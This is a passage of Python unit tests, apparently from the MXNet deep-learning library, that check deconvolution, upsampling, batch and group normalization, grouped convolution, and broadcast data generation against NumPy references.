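# Editor's note: an illustrative sketch, not part of the original test suite. Without an explicit
# target_shape, the spatial output size of a transposed convolution follows the usual formula
# out = (in - 1) * stride - 2 * pad + kernel + adj; the default_target_size of 8 above is
# consistent with this for input 4, kernel 3, stride 2, pad 1, adj 1. The helper name is hypothetical.
def _deconv_out_size(in_size, kernel, stride, pad, adj):
    return (in_size - 1) * stride - 2 * pad + kernel + adj
assert _deconv_out_size(4, kernel=3, stride=2, pad=1, adj=1) == 8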
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@pytest.mark.parametrize('shape,num_filter,num_group,kernel,pad', [
((1, 4, 15), 16, 2, (2,), (0,)),
((8, 4, 16), 16, 1, (3,), (1,)),
((1, 4, 15, 16), 16, 2, (2, 2), (0, 0)),
((8, 4, 16, 16), 16, 1, (3, 3), (1, 1)),
((1, 4, 3, 15, 16), 16, 2, (2, 2, 2), (0, 0, 0)),
((8, 4, 3, 16, 16), 16, 1, (3, 3, 3), (1, 1, 1))])
def test_deconvolution_forward_with_bias(shape, num_filter, num_group, kernel, pad):
"""Check if deconvolution forward can work well with bias=True
"""
if len(kernel) == 3 and mx.current_context().device_type == 'gpu':
pytest.skip('Skipping Conv3DTranspose tests for GPU')
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y_nb = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=True, pad=pad)
y_b = mx.sym.Deconvolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe_nb = y_nb._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe_b = y_b._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
data = np.random.uniform(-5, 5, size=exe_b.arg_arrays[0].shape)
weights = np.random.normal(size=exe_b.arg_arrays[1].shape)
bias = np.random.normal(size=exe_b.arg_arrays[2].shape)
def exe_forward(exe):
exe.arg_arrays[0][:] = data
exe.arg_arrays[1][:] = weights
if len(exe.arg_arrays) == 3:
exe.arg_arrays[2][:] = bias
return exe.forward(is_train=False)[0].asnumpy()
out_nb = exe_forward(exe_nb)
out_b = exe_forward(exe_b)
bias = np.broadcast_to(bias, [np.prod(out_nb.shape[2:])] + [num_filter]).T
bias = np.broadcast_to(bias.reshape((num_filter, *out_nb.shape[2:])), out_b.shape)
assert_almost_equal(out_nb + bias, out_b)
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_device()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_device(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_device()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_device(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
        # bilinear upsampling takes exactly one data and one weight input;
        # the multi-input mode is not applicable here
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
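# Editor's note: an illustrative sketch, not part of the original test suite. _init_bilinear above
# fills the weight with the standard separable bilinear interpolation kernel: for an upsampling
# factor f the 1D weights are 1 - |x / f - c| with c = (2f - 1 - f % 2) / (2f), e.g. f = 2 gives
# [0.25, 0.75, 0.75, 0.25]. The helper below is hypothetical and uses only numpy.
def _bilinear_kernel_1d(f):
    size = 2 * f - f % 2
    c = (2 * f - 1 - f % 2) / (2.0 * f)
    return np.array([1.0 - abs(x / f - c) for x in range(size)])
assert np.allclose(_bilinear_kernel_1d(2), [0.25, 0.75, 0.75, 0.25])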
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
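    # NumPy reference for the GroupNorm forward pass: normalize with per-(sample, group)
    # statistics, then apply the per-channel gamma/beta affine transform.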
def np_groupnorm(data, gamma, beta, num_groups, eps):
        dshape = data.shape
        new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
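    # NumPy reference for the GroupNorm backward pass: gradients for data, gamma and
    # beta derived from the same group-wise mean/std used in the forward pass.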
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_device(), x=shape)
exe2 = y2._simple_bind(default_device(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_device()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
    for dim, num_base, kernel_x, stride_x, pad_x, in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
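# Helpers below generate (lhs, rhs) NumPy input pairs for the binary and broadcast
# operator checks: a table of fixed broadcast-compatible shapes for small idx values,
# and randomly generated broadcast-compatible shapes otherwise.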
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1-5 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
